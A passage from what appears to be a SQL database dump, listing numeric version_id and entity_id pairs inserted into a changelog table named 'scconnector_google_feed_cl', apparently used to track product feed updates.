(12313, 626),
(12314, 626),
(12315, 626),
(12316, 627),
(12317, 627),
(12318, 627),
(12319, 627),
(12320, 627),
(12321, 627),
(12322, 628),
(12323, 628),
(12324, 628),
(12325, 628),
(12326, 628),
(12327, 628),
(12328, 629),
(12329, 629),
(12330, 629),
(12331, 629),
(12332, 629),
(12333, 629),
(12334, 630),
(12335, 630),
(12336, 630),
(12337, 630),
(12338, 630),
(12339, 630),
(12340, 631),
(12341, 631),
(12342, 631),
(12343, 631),
(12344, 631),
(12345, 631),
(12346, 632),
(12347, 632),
(12348, 632),
(12349, 632),
(12350, 632),
(12351, 632),
(12352, 633),
(12353, 633),
(12354, 633),
(12355, 633),
(12356, 633),
(12357, 633),
(12358, 634),
(12359, 634),
(12360, 634),
(12361, 634),
(12362, 634),
(12363, 634),
(12364, 635),
(12365, 635),
(12366, 635),
(12367, 635),
(12368, 635),
(12369, 635),
(12370, 635),
(12371, 635),
(12372, 635),
(12373, 636),
(12374, 636),
(12375, 636),
(12376, 636),
(12377, 636),
(12378, 636),
(12379, 637),
(12380, 637),
(12381, 637),
(12382, 637),
(12383, 637),
(12384, 637),
(12385, 638),
(12386, 638),
(12387, 638),
(12388, 638),
(12389, 638),
(12390, 638),
(12391, 639),
(12392, 639),
(12393, 639),
(12394, 639),
(12395, 639),
(12396, 639),
(12397, 640),
(12398, 640),
(12399, 640),
(12400, 640),
(12401, 640),
(12402, 640),
(12403, 641),
(12404, 641),
(12405, 641),
(12406, 641),
(12407, 641),
(12408, 641),
(12409, 642),
(12410, 642),
(12411, 642),
(12412, 642),
(12413, 642),
(12414, 642),
(12415, 643),
(12416, 643),
(12417, 643),
(12418, 643),
(12419, 643),
(12420, 643),
(12421, 644),
(12422, 644),
(12423, 644),
(12424, 644),
(12425, 644),
(12426, 644),
(12427, 645),
(12428, 645),
(12429, 645),
(12430, 645),
(12431, 645),
(12432, 645),
(12433, 646),
(12434, 646),
(12435, 646),
(12436, 646),
(12437, 646),
(12438, 646),
(12439, 647),
(12440, 647),
(12441, 647),
(12442, 647),
(12443, 647),
(12444, 647),
(12445, 648),
(12446, 648),
(12447, 648),
(12448, 648),
(12449, 648),
(12450, 648),
(12451, 649),
(12452, 649),
(12453, 649),
(12454, 649),
(12455, 649),
(12456, 649),
(12457, 650),
(12458, 650),
(12459, 650),
(12460, 650),
(12461, 650),
(12462, 650),
(12463, 651),
(12464, 651),
(12465, 651),
(12466, 651),
(12467, 651),
(12468, 651),
(12469, 651),
(12470, 651),
(12471, 651),
(12472, 652),
(12473, 652),
(12474, 652),
(12475, 652),
(12476, 652),
(12477, 652),
(12478, 653),
(12479, 653),
(12480, 653),
(12481, 653),
(12482, 653),
(12483, 653),
(12484, 654),
(12485, 654),
(12486, 654),
(12487, 654),
(12488, 654),
(12489, 654),
(12490, 655),
(12491, 655),
(12492, 655),
(12493, 655),
(12494, 655),
(12495, 655),
(12496, 656),
(12497, 656),
(12498, 656),
(12499, 656),
(12500, 656),
(12501, 656),
(12502, 657),
(12503, 657),
(12504, 657),
(12505, 657),
(12506, 657),
(12507, 657),
(12508, 658),
(12509, 658),
(12510, 658),
(12511, 658),
(12512, 658),
(12513, 658),
(12514, 659),
(12515, 659),
(12516, 659),
(12517, 659),
(12518, 659),
(12519, 659),
(12520, 560),
(12521, 560),
(12522, 561),
(12523, 561),
(12524, 562),
(12525, 562),
(12526, 563),
(12527, 563),
(12528, 564),
(12529, 564),
(12530, 565),
(12531, 565),
(12532, 566),
(12533, 566),
(12534, 567),
(12535, 567),
(12536, 568),
(12537, 568),
(12538, 569),
(12539, 569),
(12540, 570),
(12541, 570),
(12542, 571),
(12543, 572),
(12544, 572),
(12545, 573),
(12546, 573),
(12547, 574),
(12548, 574),
(12549, 575),
(12550, 575),
(12551, 576),
(12552, 576),
(12553, 577),
(12554, 577),
(12555, 578),
(12556, 578),
(12557, 579),
(12558, 579),
(12559, 580),
(12560, 580),
(12561, 581),
(12562, 581),
(12563, 582),
(12564, 582),
(12565, 583),
(12566, 583),
(12567, 584),
(12568, 584),
(12569, 585),
(12570, 585),
(12571, 586),
(12572, 586),
(12573, 587),
(12574, 588),
(12575, 588),
(12576, 589),
(12577, 589),
(12578, 590),
(12579, 590),
(12580, 591),
(12581, 591),
(12582, 592),
(12583, 592),
(12584, 593),
(12585, 593),
(12586, 594),
(12587, 594),
(12588, 595),
(12589, 595),
(12590, 596),
(12591, 596),
(12592, 597),
(12593, 597),
(12594, 598),
(12595, 598),
(12596, 599),
(12597, 599),
(12598, 600),
(12599, 600),
(12600, 601),
(12601, 601),
(12602, 602),
(12603, 602),
(12604, 603),
(12605, 604),
(12606, 604),
(12607, 605),
(12608, 605),
(12609, 606),
(12610, 606),
(12611, 607),
(12612, 607),
(12613, 608),
(12614, 608),
(12615, 609),
(12616, 609),
(12617, 610),
(12618, 610),
(12619, 611),
(12620, 611),
(12621, 612),
(12622, 612),
(12623, 613),
(12624, 613),
(12625, 614),
(12626, 614),
(12627, 615),
(12628, 615),
(12629, 616),
(12630, 616),
(12631, 617),
(12632, 617),
(12633, 618),
(12634, 618),
(12635, 619),
(12636, 620),
(12637, 620),
(12638, 621),
(12639, 621),
(12640, 622),
(12641, 622),
(12642, 623),
(12643, 623),
(12644, 624),
(12645, 624),
(12646, 625),
(12647, 625),
(12648, 626),
(12649, 626),
(12650, 627),
(12651, 627),
(12652, 628),
(12653, 628),
(12654, 629),
(12655, 629),
(12656, 630),
(12657, 630),
(12658, 631),
(12659, 631),
(12660, 632),
(12661, 632),
(12662, 633),
(12663, 633),
(12664, 634),
(12665, 634),
(12666, 635),
(12667, 636),
(12668, 636),
(12669, 637),
(12670, 637),
(12671, 638),
(12672, 638),
(12673, 639),
(12674, 639),
(12675, 640),
(12676, 640),
(12677, 641),
(12678, 641),
(12679, 642),
(12680, 642),
(12681, 643),
(12682, 643),
(12683, 644),
(12684, 644),
(12685, 645),
(12686, 645),
(12687, 646),
(12688, 646),
(12689, 647),
(12690, 647),
(12691, 648),
(12692, 648),
(12693, 649),
(12694, 649),
(12695, 650),
(12696, 650),
(12697, 651),
(12698, 652),
(12699, 652),
(12700, 653),
(12701, 653),
(12702, 654),
(12703, 654),
(12704, 655),
(12705, 655),
(12706, 656),
(12707, 656),
(12708, 657),
(12709, 657),
(12710, 658),
(12711, 658),
(12712, 659),
(12713, 659),
(12714, 660),
(12715, 661),
(12716, 662),
(12717, 663),
(12718, 664),
(12719, 665),
(12720, 666),
(12721, 667),
(12722, 668),
(12723, 669),
(12724, 670),
(12725, 671),
(12726, 672),
(12727, 673),
(12728, 674),
(12729, 675),
(12730, 676),
(12731, 677),
(12732, 678),
(12733, 679),
(12734, 680),
(12735, 681),
(12736, 682),
(12737, 683),
(12738, 684),
(12739, 685),
(12740, 686),
(12741, 687),
(12742, 688),
(12743, 689),
(12744, 690),
(12745, 691),
(12746, 692),
(12747, 693),
(12748, 694),
(12749, 695),
(12750, 696),
(12751, 697),
(12752, 698),
(12753, 699),
(12754, 700),
(12755, 701),
(12756, 702),
(12757, 703),
(12758, 704),
(12759, 705),
(12760, 706),
(12761, 707),
(12762, 708),
(12763, 709),
(12764, 710),
(12765, 711),
(12766, 712),
(12767, 713),
(12768, 714),
(12769, 715),
(12770, 716),
(12771, 717),
(12772, 718),
(12773, 719),
(12774, 720),
(12775, 721),
(12776, 722),
(12777, 723),
(12778, 724),
(12779, 725),
(12780, 726),
(12781, 727),
(12782, 728),
(12783, 729),
(12784, 730),
(12785, 731),
(12786, 732),
(12787, 733),
(12788, 734),
(12789, 735),
(12790, 736),
(12791, 737),
(12792, 738),
(12793, 739),
(12794, 740),
(12795, 741),
(12796, 742),
(12797, 743),
(12798, 744),
(12799, 745),
(12800, 746),
(12801, 747),
(12802, 748),
(12803, 749),
(12804, 750),
(12805, 751),
(12806, 752),
(12807, 753),
(12808, 754),
(12809, 755),
(12810, 756),
(12811, 757),
(12812, 758),
(12813, 759),
(12814, 660),
(12815, 660),
(12816, 660),
(12817, 660),
(12818, 661),
(12819, 662),
(12820, 663),
(12821, 663),
(12822, 663),
(12823, 663),
(12824, 664),
(12825, 665),
(12826, 666),
(12827, 666),
(12828, 666),
(12829, 666),
(12830, 667),
(12831, 667),
(12832, 667),
(12833, 667),
(12834, 668),
(12835, 669),
(12836, 670),
(12837, 671),
(12838, 672),
(12839, 673),
(12840, 674),
(12841, 675),
(12842, 676),
(12843, 677),
(12844, 678),
(12845, 679),
(12846, 680),
(12847, 681),
(12848, 682),
(12849, 683),
(12850, 684),
(12851, 684),
(12852, 684),
(12853, 685),
(12854, 685),
(12855, 685),
(12856, 686),
(12857, 686),
(12858, 686),
(12859, 687),
(12860, 687),
(12861, 687),
(12862, 688),
(12863, 688),
(12864, 688),
(12865, 689),
(12866, 689),
(12867, 689),
(12868, 690),
(12869, 690),
(12870, 691),
(12871, 691),
(12872, 692),
(12873, 692),
(12874, 693),
(12875, 693),
(12876, 694),
(12877, 694),
(12878, 695),
(12879, 695),
(12880, 696),
(12881, 696),
(12882, 697),
(12883, 697),
(12884, 698),
(12885, 698),
(12886, 699),
(12887, 699),
(12888, 700),
(12889, 700),
(12890, 701),
(12891, 701),
(12892, 702),
(12893, 702),
(12894, 703),
(12895, 703),
(12896, 704),
(12897, 704),
(12898, 705),
(12899, 705),
(12900, 706),
(12901, 706),
(12902, 707),
(12903, 707),
(12904, 708),
(12905, 708),
(12906, 708),
(12907, 709),
(12908, 709),
(12909, 709),
(12910, 710),
(12911, 710),
(12912, 710),
(12913, 711),
(12914, 711),
(12915, 711),
(12916, 712),
(12917, 712),
(12918, 712),
(12919, 713),
(12920, 713),
(12921, 713),
(12922, 714),
(12923, 714),
(12924, 714),
(12925, 715),
(12926, 715),
(12927, 715),
(12928, 716),
(12929, 716),
(12930, 716),
(12931, 717),
(12932, 717),
(12933, 717),
(12934, 718),
(12935, 718),
(12936, 718),
(12937, 719),
(12938, 719),
(12939, 719),
(12940, 720),
(12941, 720),
(12942, 721),
(12943, 721),
(12944, 722),
(12945, 722),
(12946, 723),
(12947, 723),
(12948, 724),
(12949, 724),
(12950, 725),
(12951, 725),
(12952, 726),
(12953, 726),
(12954, 727),
(12955, 727),
(12956, 728),
(12957, 728),
(12958, 729),
(12959, 729),
(12960, 730),
(12961, 730),
(12962, 731),
(12963, 731),
(12964, 732),
(12965, 732),
(12966, 733),
(12967, 733),
(12968, 734),
(12969, 734),
(12970, 735),
(12971, 735),
(12972, 736),
(12973, 736),
(12974, 737),
(12975, 737),
(12976, 738),
(12977, 739),
(12978, 739),
(12979, 740),
(12980, 741),
(12981, 742),
(12982, 742),
(12983, 743),
(12984, 744),
(12985, 745),
(12986, 745),
(12987, 746),
(12988, 747),
(12989, 748),
(12990, 748),
(12991, 749),
(12992, 750),
(12993, 750),
(12994, 751),
(12995, 752),
(12996, 752),
(12997, 753),
(12998, 754),
(12999, 755),
(13000, 755),
(13001, 756),
(13002, 757),
(13003, 758),
(13004, 758),
(13005, 759),
(13006, 660),
(13007, 660),
(13008, 660),
(13009, 660),
(13010, 660),
(13011, 660),
(13012, 660),
(13013, 661),
(13014, 661),
(13015, 661),
(13016, 661),
(13017, 661),
(13018, 661),
(13019, 661),
(13020, 662),
(13021, 662),
(13022, 662),
(13023, 662),
(13024, 662),
(13025, 662),
(13026, 662),
(13027, 663),
(13028, 663),
(13029, 663),
(13030, 663),
(13031, 663),
(13032, 663),
(13033, 663),
(13034, 664),
(13035, 664),
(13036, 664),
(13037, 664),
(13038, 664),
(13039, 664),
(13040, 664),
(13041, 665),
(13042, 665),
(13043, 665),
(13044, 665),
(13045, 665),
(13046, 665),
(13047, 665),
(13048, 666),
(13049, 666),
(13050, 666),
(13051, 666),
(13052, 666),
(13053, 666),
(13054, 666),
(13055, 667),
(13056, 667),
(13057, 667),
(13058, 667),
(13059, 667),
(13060, 667),
(13061, 667),
(13062, 667),
(13063, 667),
(13064, 667),
(13065, 667),
(13066, 668),
(13067, 668),
(13068, 668),
(13069, 668),
(13070, 668),
(13071, 668),
(13072, 668),
(13073, 669),
(13074, 669),
(13075, 669),
(13076, 669),
(13077, 669),
(13078, 669),
(13079, 669),
(13080, 670),
(13081, 670),
(13082, 670),
(13083, 670),
(13084, 670),
(13085, 670),
(13086, 670),
(13087, 671),
(13088, 671),
(13089, 671),
(13090, 671),
(13091, 671),
(13092, 671),
(13093, 671),
(13094, 672),
(13095, 672),
(13096, 672),
(13097, 672),
(13098, 672),
(13099, 672),
(13100, 672),
(13101, 673),
(13102, 673),
(13103, 673),
(13104, 673),
(13105, 673),
(13106, 673),
(13107, 673),
(13108, 674),
(13109, 674),
(13110, 674),
(13111, 674),
(13112, 674),
(13113, 674),
(13114, 674),
(13115, 675),
(13116, 675),
(13117, 675),
(13118, 675),
(13119, 675),
(13120, 675),
(13121, 675),
(13122, 676),
(13123, 676),
(13124, 676),
(13125, 676),
(13126, 676),
(13127, 676),
(13128, 676),
(13129, 677),
(13130, 677),
(13131, 677),
(13132, 677),
(13133, 677),
(13134, 677),
(13135, 677),
(13136, 678),
(13137, 678),
(13138, 678),
(13139, 678),
(13140, 678),
(13141, 678),
(13142, 678),
(13143, 679),
(13144, 679),
(13145, 679),
(13146, 679),
(13147, 679),
(13148, 679),
(13149, 679),
(13150, 680),
(13151, 680),
(13152, 680),
(13153, 680),
(13154, 680),
(13155, 680),
(13156, 680),
(13157, 681),
(13158, 681),
(13159, 681),
(13160, 681),
(13161, 681),
(13162, 681),
(13163, 681),
(13164, 682),
(13165, 682),
(13166, 682),
(13167, 682),
(13168, 682),
(13169, 682),
(13170, 682),
(13171, 683),
(13172, 683),
(13173, 683),
(13174, 683),
(13175, 683),
(13176, 683),
(13177, 683),
(13178, 683),
(13179, 683),
(13180, 683),
(13181, 683),
(13182, 684),
(13183, 684),
(13184, 684),
(13185, 684),
(13186, 684),
(13187, 684),
(13188, 684),
(13189, 685),
(13190, 685),
(13191, 685),
(13192, 685),
(13193, 685),
(13194, 685),
(13195, 685),
(13196, 686),
(13197, 686),
(13198, 686),
(13199, 686),
(13200, 686),
(13201, 686),
(13202, 686),
(13203, 687),
(13204, 687),
(13205, 687),
(13206, 687),
(13207, 687),
(13208, 687),
(13209, 687),
(13210, 688),
(13211, 688),
(13212, 688),
(13213, 688),
(13214, 688),
(13215, 688),
(13216, 688),
(13217, 689),
(13218, 689),
(13219, 689),
(13220, 689),
(13221, 689),
(13222, 689),
(13223, 689),
(13224, 689),
(13225, 689),
(13226, 689),
(13227, 689),
(13228, 690),
(13229, 690),
(13230, 690),
(13231, 690),
(13232, 690),
(13233, 690),
(13234, 690),
(13235, 691),
(13236, 691),
(13237, 691),
(13238, 691),
(13239, 691),
(13240, 691),
(13241, 691),
(13242, 692),
(13243, 692),
(13244, 692),
(13245, 692),
(13246, 692),
(13247, 692),
(13248, 692),
(13249, 693),
(13250, 693),
(13251, 693),
(13252, 693),
(13253, 693),
(13254, 693),
(13255, 693),
(13256, 694),
(13257, 694),
(13258, 694),
(13259, 694),
(13260, 694),
(13261, 694),
(13262, 694),
(13263, 695),
(13264, 695),
(13265, 695),
(13266, 695),
(13267, 695),
(13268, 695),
(13269, 695),
(13270, 695),
(13271, 695),
(13272, 695),
(13273, 695),
(13274, 696),
(13275, 696),
(13276, 696),
(13277, 696),
(13278, 696),
(13279, 696),
(13280, 696),
(13281, 697),
(13282, 697),
(13283, 697),
(13284, 697),
(13285, 697),
(13286, 697),
(13287, 697),
(13288, 698),
(13289, 698),
(13290, 698),
(13291, 698),
(13292, 698),
(13293, 698),
(13294, 698),
(13295, 699),
(13296, 699),
(13297, 699),
(13298, 699),
(13299, 699),
(13300, 699),
(13301, 699),
(13302, 700),
(13303, 700),
(13304, 700),
(13305, 700),
(13306, 700),
(13307, 700),
(13308, 700),
(13309, 701),
(13310, 701),
(13311, 701),
(13312, 701),
(13313, 701),
(13314, 701),
(13315, 701),
(13316, 701),
(13317, 701),
(13318, 701),
(13319, 701),
(13320, 702),
(13321, 702),
(13322, 702),
(13323, 702),
(13324, 702),
(13325, 702),
(13326, 702),
(13327, 703),
(13328, 703),
(13329, 703),
(13330, 703),
(13331, 703),
(13332, 703),
(13333, 703),
(13334, 704),
(13335, 704),
(13336, 704),
(13337, 704),
(13338, 704),
(13339, 704),
(13340, 704),
(13341, 705),
(13342, 705),
(13343, 705),
(13344, 705),
(13345, 705),
(13346, 705),
(13347, 705),
(13348, 706),
(13349, 706),
(13350, 706),
(13351, 706),
(13352, 706),
(13353, 706),
(13354, 706),
(13355, 707),
(13356, 707),
(13357, 707),
(13358, 707),
(13359, 707),
(13360, 707),
(13361, 707),
(13362, 707),
(13363, 707),
(13364, 707),
(13365, 707),
(13366, 708),
(13367, 708),
(13368, 708),
(13369, 708),
(13370, 708),
(13371, 708),
(13372, 708),
(13373, 709),
(13374, 709),
(13375, 709),
(13376, 709),
(13377, 709),
(13378, 709),
(13379, 709),
(13380, 710),
(13381, 710),
(13382, 710),
(13383, 710),
(13384, 710),
(13385, 710),
(13386, 710),
(13387, 711),
(13388, 711),
(13389, 711),
(13390, 711),
(13391, 711),
(13392, 711),
(13393, 711),
(13394, 712),
(13395, 712),
(13396, 712),
(13397, 712),
(13398, 712),
(13399, 712),
(13400, 712),
(13401, 713),
(13402, 713),
(13403, 713),
(13404, 713),
(13405, 713),
(13406, 713),
(13407, 713),
(13408, 713),
(13409, 713),
(13410, 713),
(13411, 713),
(13412, 714),
(13413, 714),
(13414, 714),
(13415, 714),
(13416, 714),
(13417, 714),
(13418, 714),
(13419, 715),
(13420, 715),
(13421, 715),
(13422, 715),
(13423, 715),
(13424, 715),
(13425, 715),
(13426, 716),
(13427, 716),
(13428, 716),
(13429, 716),
(13430, 716),
(13431, 716),
(13432, 716),
(13433, 717),
(13434, 717),
(13435, 717),
(13436, 717),
(13437, 717),
(13438, 717),
(13439, 717),
(13440, 718),
(13441, 718),
(13442, 718),
(13443, 718),
(13444, 718),
(13445, 718),
(13446, 718),
(13447, 719),
(13448, 719),
(13449, 719),
(13450, 719),
(13451, 719),
(13452, 719),
(13453, 719),
(13454, 719),
(13455, 719),
(13456, 719),
(13457, 719),
(13458, 720),
(13459, 720),
(13460, 720),
(13461, 720),
(13462, 720),
(13463, 720),
(13464, 720),
(13465, 721),
(13466, 721),
(13467, 721),
(13468, 721),
(13469, 721),
(13470, 721),
(13471, 721),
(13472, 722),
(13473, 722),
(13474, 722),
(13475, 722),
(13476, 722),
(13477, 722),
(13478, 722),
(13479, 723),
(13480, 723),
(13481, 723),
(13482, 723),
(13483, 723),
(13484, 723),
(13485, 723),
(13486, 724),
(13487, 724),
(13488, 724),
(13489, 724),
(13490, 724),
(13491, 724),
(13492, 724),
(13493, 725),
(13494, 725),
(13495, 725),
(13496, 725),
(13497, 725),
(13498, 725),
(13499, 725),
(13500, 725),
(13501, 725),
(13502, 725),
(13503, 725),
(13504, 726),
(13505, 726),
(13506, 726),
(13507, 726),
(13508, 726),
(13509, 726),
(13510, 726),
(13511, 727),
(13512, 727),
(13513, 727),
(13514, 727),
(13515, 727),
(13516, 727),
(13517, 727),
(13518, 728),
(13519, 728),
(13520, 728),
(13521, 728),
(13522, 728),
(13523, 728),
(13524, 728),
(13525, 729),
(13526, 729),
(13527, 729),
(13528, 729),
(13529, 729),
(13530, 729),
(13531, 729),
(13532, 730),
(13533, 730),
(13534, 730),
(13535, 730),
(13536, 730),
(13537, 730),
(13538, 730),
(13539, 731),
(13540, 731),
(13541, 731),
(13542, 731),
(13543, 731),
(13544, 731),
(13545, 731),
(13546, 731),
(13547, 731),
(13548, 731),
(13549, 731),
(13550, 732),
(13551, 732),
(13552, 732),
(13553, 732),
(13554, 732),
(13555, 732),
(13556, 732),
(13557, 733),
(13558, 733),
(13559, 733),
(13560, 733),
(13561, 733),
(13562, 733),
(13563, 733),
(13564, 734),
(13565, 734),
(13566, 734),
(13567, 734),
(13568, 734),
(13569, 734),
(13570, 734),
(13571, 735),
(13572, 735),
(13573, 735),
(13574, 735),
(13575, 735),
(13576, 735),
(13577, 735),
(13578, 736),
(13579, 736),
(13580, 736),
(13581, 736),
(13582, 736),
(13583, 736),
(13584, 736),
(13585, 737),
(13586, 737),
(13587, 737),
(13588, 737),
(13589, 737),
(13590, 737),
(13591, 737),
(13592, 737),
(13593, 737),
(13594, 737),
(13595, 737),
(13596, 738),
(13597, 738),
(13598, 738),
(13599, 738),
(13600, 738),
(13601, 738),
(13602, 738),
(13603, 739),
(13604, 739),
(13605, 739),
(13606, 739),
(13607, 739),
(13608, 739),
(13609, 739),
(13610, 740),
(13611, 740),
(13612, 740),
(13613, 740),
(13614, 740),
(13615, 740),
(13616, 740),
(13617, 741),
(13618, 741),
(13619, 741),
(13620, 741),
(13621, 741),
(13622, 741),
(13623, 741),
(13624, 742),
(13625, 742),
(13626, 742),
(13627, 742),
(13628, 742),
(13629, 742),
(13630, 742),
(13631, 743),
(13632, 743),
(13633, 743),
(13634, 743),
(13635, 743),
(13636, 743),
(13637, 743),
(13638, 744),
(13639, 744),
(13640, 744),
(13641, 744),
(13642, 744),
(13643, 744),
(13644, 744),
(13645, 745),
(13646, 745),
(13647, 745),
(13648, 745),
(13649, 745),
(13650, 745),
(13651, 745),
(13652, 746),
(13653, 746),
(13654, 746),
(13655, 746),
(13656, 746),
(13657, 746),
(13658, 746),
(13659, 747),
(13660, 747),
(13661, 747),
(13662, 747),
(13663, 747),
(13664, 747),
(13665, 747),
(13666, 748),
(13667, 748);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(13668, 748),
(13669, 748),
(13670, 748),
(13671, 748),
(13672, 748),
(13673, 749),
(13674, 749),
(13675, 749),
(13676, 749),
(13677, 749),
(13678, 749),
(13679, 749),
(13680, 750),
(13681, 750),
(13682, 750),
(13683, 750),
(13684, 750),
(13685, 750),
(13686, 750),
(13687, 750),
(13688, 750),
(13689, 750),
(13690, 750),
(13691, 751),
(13692, 751),
(13693, 751),
(13694, 751),
(13695, 751),
(13696, 751),
(13697, 751),
(13698, 752),
(13699, 752),
(13700, 752),
(13701, 752),
(13702, 752),
(13703, 752),
(13704, 752),
(13705, 753),
(13706, 753),
(13707, 753),
(13708, 753),
(13709, 753),
(13710, 753),
(13711, 753),
(13712, 754),
(13713, 754),
(13714, 754),
(13715, 754),
(13716, 754),
(13717, 754),
(13718, 754),
(13719, 755),
(13720, 755),
(13721, 755),
(13722, 755),
(13723, 755),
(13724, 755),
(13725, 755),
(13726, 756),
(13727, 756),
(13728, 756),
(13729, 756),
(13730, 756),
(13731, 756),
(13732, 756),
(13733, 757),
(13734, 757),
(13735, 757),
(13736, 757),
(13737, 757),
(13738, 757),
(13739, 757),
(13740, 758),
(13741, 758),
(13742, 758),
(13743, 758),
(13744, 758),
(13745, 758),
(13746, 758),
(13747, 759),
(13748, 759),
(13749, 759),
(13750, 759),
(13751, 759),
(13752, 759),
(13753, 759),
(13754, 660),
(13755, 661),
(13756, 662),
(13757, 663),
(13758, 664),
(13759, 665),
(13760, 666),
(13761, 667),
(13762, 668),
(13763, 669),
(13764, 670),
(13765, 671),
(13766, 672),
(13767, 673),
(13768, 674),
(13769, 675),
(13770, 676),
(13771, 677),
(13772, 678),
(13773, 679),
(13774, 680),
(13775, 681),
(13776, 682),
(13777, 683),
(13778, 684),
(13779, 685),
(13780, 686),
(13781, 687),
(13782, 688),
(13783, 689),
(13784, 690),
(13785, 691),
(13786, 692),
(13787, 693),
(13788, 694),
(13789, 695),
(13790, 696),
(13791, 697),
(13792, 698),
(13793, 699),
(13794, 700),
(13795, 701),
(13796, 702),
(13797, 703),
(13798, 704),
(13799, 705),
(13800, 706),
(13801, 707),
(13802, 708),
(13803, 709),
(13804, 710),
(13805, 711),
(13806, 712),
(13807, 713),
(13808, 714),
(13809, 715),
(13810, 716),
(13811, 717),
(13812, 718),
(13813, 719),
(13814, 720),
(13815, 721),
(13816, 722),
(13817, 723),
(13818, 724),
(13819, 725),
(13820, 726),
(13821, 727),
(13822, 728),
(13823, 729),
(13824, 730),
(13825, 731),
(13826, 732),
(13827, 733),
(13828, 734),
(13829, 735),
(13830, 736),
(13831, 737),
(13832, 738),
(13833, 739),
(13834, 740),
(13835, 741),
(13836, 742),
(13837, 743),
(13838, 744),
(13839, 745),
(13840, 746),
(13841, 747),
(13842, 748),
(13843, 749),
(13844, 750),
(13845, 751),
(13846, 752),
(13847, 753),
(13848, 754),
(13849, 755),
(13850, 756),
(13851, 757),
(13852, 758),
(13853, 759),
(13854, 660),
(13855, 660),
(13856, 660),
(13857, 660),
(13858, 660),
(13859, 660),
(13860, 661),
(13861, 661),
(13862, 661),
(13863, 661),
(13864, 661),
(13865, 661),
(13866, 662),
(13867, 662),
(13868, 662),
(13869, 662),
(13870, 662),
(13871, 662),
(13872, 663),
(13873, 663),
(13874, 663),
(13875, 663),
(13876, 663),
(13877, 663),
(13878, 664),
(13879, 664),
(13880, 664),
(13881, 664),
(13882, 664),
(13883, 664),
(13884, 665),
(13885, 665),
(13886, 665),
(13887, 665),
(13888, 665),
(13889, 665),
(13890, 666),
(13891, 666),
(13892, 666),
(13893, 666),
(13894, 666),
(13895, 666),
(13896, 667),
(13897, 667),
(13898, 667),
(13899, 667),
(13900, 667),
(13901, 667),
(13902, 667),
(13903, 667),
(13904, 667),
(13905, 668),
(13906, 668),
(13907, 668),
(13908, 668),
(13909, 668),
(13910, 668),
(13911, 669),
(13912, 669),
(13913, 669),
(13914, 669),
(13915, 669),
(13916, 669),
(13917, 670),
(13918, 670),
(13919, 670),
(13920, 670),
(13921, 670),
(13922, 670),
(13923, 671),
(13924, 671),
(13925, 671),
(13926, 671),
(13927, 671),
(13928, 671),
(13929, 672),
(13930, 672),
(13931, 672),
(13932, 672),
(13933, 672),
(13934, 672),
(13935, 673),
(13936, 673),
(13937, 673),
(13938, 673),
(13939, 673),
(13940, 673),
(13941, 674),
(13942, 674),
(13943, 674),
(13944, 674),
(13945, 674),
(13946, 674),
(13947, 675),
(13948, 675),
(13949, 675),
(13950, 675),
(13951, 675),
(13952, 675),
(13953, 676),
(13954, 676),
(13955, 676),
(13956, 676),
(13957, 676),
(13958, 676),
(13959, 677),
(13960, 677),
(13961, 677),
(13962, 677),
(13963, 677),
(13964, 677),
(13965, 678),
(13966, 678),
(13967, 678),
(13968, 678),
(13969, 678),
(13970, 678),
(13971, 679),
(13972, 679),
(13973, 679),
(13974, 679),
(13975, 679),
(13976, 679),
(13977, 680),
(13978, 680),
(13979, 680),
(13980, 680),
(13981, 680),
(13982, 680),
(13983, 681),
(13984, 681),
(13985, 681),
(13986, 681),
(13987, 681),
(13988, 681),
(13989, 682),
(13990, 682),
(13991, 682),
(13992, 682),
(13993, 682),
(13994, 682),
(13995, 683),
(13996, 683),
(13997, 683),
(13998, 683),
(13999, 683),
(14000, 683),
(14001, 683),
(14002, 683),
(14003, 683),
(14004, 684),
(14005, 684),
(14006, 684),
(14007, 684),
(14008, 684),
(14009, 684),
(14010, 685),
(14011, 685),
(14012, 685),
(14013, 685),
(14014, 685),
(14015, 685),
(14016, 686),
(14017, 686),
(14018, 686),
(14019, 686),
(14020, 686),
(14021, 686),
(14022, 687),
(14023, 687),
(14024, 687),
(14025, 687),
(14026, 687),
(14027, 687),
(14028, 688),
(14029, 688),
(14030, 688),
(14031, 688),
(14032, 688),
(14033, 688),
(14034, 689),
(14035, 689),
(14036, 689),
(14037, 689),
(14038, 689),
(14039, 689),
(14040, 689),
(14041, 689),
(14042, 689),
(14043, 690),
(14044, 690),
(14045, 690),
(14046, 690),
(14047, 690),
(14048, 690),
(14049, 691),
(14050, 691),
(14051, 691),
(14052, 691),
(14053, 691),
(14054, 691),
(14055, 692),
(14056, 692),
(14057, 692),
(14058, 692),
(14059, 692),
(14060, 692),
(14061, 693),
(14062, 693),
(14063, 693),
(14064, 693),
(14065, 693),
(14066, 693),
(14067, 694),
(14068, 694),
(14069, 694),
(14070, 694),
(14071, 694),
(14072, 694),
(14073, 695),
(14074, 695),
(14075, 695),
(14076, 695),
(14077, 695),
(14078, 695),
(14079, 695),
(14080, 695),
(14081, 695),
(14082, 696),
(14083, 696),
(14084, 696),
(14085, 696),
(14086, 696),
(14087, 696),
(14088, 697),
(14089, 697),
(14090, 697),
(14091, 697),
(14092, 697),
(14093, 697),
(14094, 698),
(14095, 698),
(14096, 698),
(14097, 698),
(14098, 698),
(14099, 698),
(14100, 699),
(14101, 699),
(14102, 699),
(14103, 699),
(14104, 699),
(14105, 699),
(14106, 700),
(14107, 700),
(14108, 700),
(14109, 700),
(14110, 700),
(14111, 700),
(14112, 701),
(14113, 701),
(14114, 701),
(14115, 701),
(14116, 701),
(14117, 701),
(14118, 701),
(14119, 701),
(14120, 701),
(14121, 702),
(14122, 702),
(14123, 702),
(14124, 702),
(14125, 702),
(14126, 702),
(14127, 703),
(14128, 703),
(14129, 703),
(14130, 703),
(14131, 703),
(14132, 703),
(14133, 704),
(14134, 704),
(14135, 704),
(14136, 704),
(14137, 704),
(14138, 704),
(14139, 705),
(14140, 705),
(14141, 705),
(14142, 705),
(14143, 705),
(14144, 705),
(14145, 706),
(14146, 706),
(14147, 706),
(14148, 706),
(14149, 706),
(14150, 706),
(14151, 707),
(14152, 707),
(14153, 707),
(14154, 707),
(14155, 707),
(14156, 707),
(14157, 707),
(14158, 707),
(14159, 707),
(14160, 708),
(14161, 708),
(14162, 708),
(14163, 708),
(14164, 708),
(14165, 708),
(14166, 709),
(14167, 709),
(14168, 709),
(14169, 709),
(14170, 709),
(14171, 709),
(14172, 710),
(14173, 710),
(14174, 710),
(14175, 710),
(14176, 710),
(14177, 710),
(14178, 711),
(14179, 711),
(14180, 711),
(14181, 711),
(14182, 711),
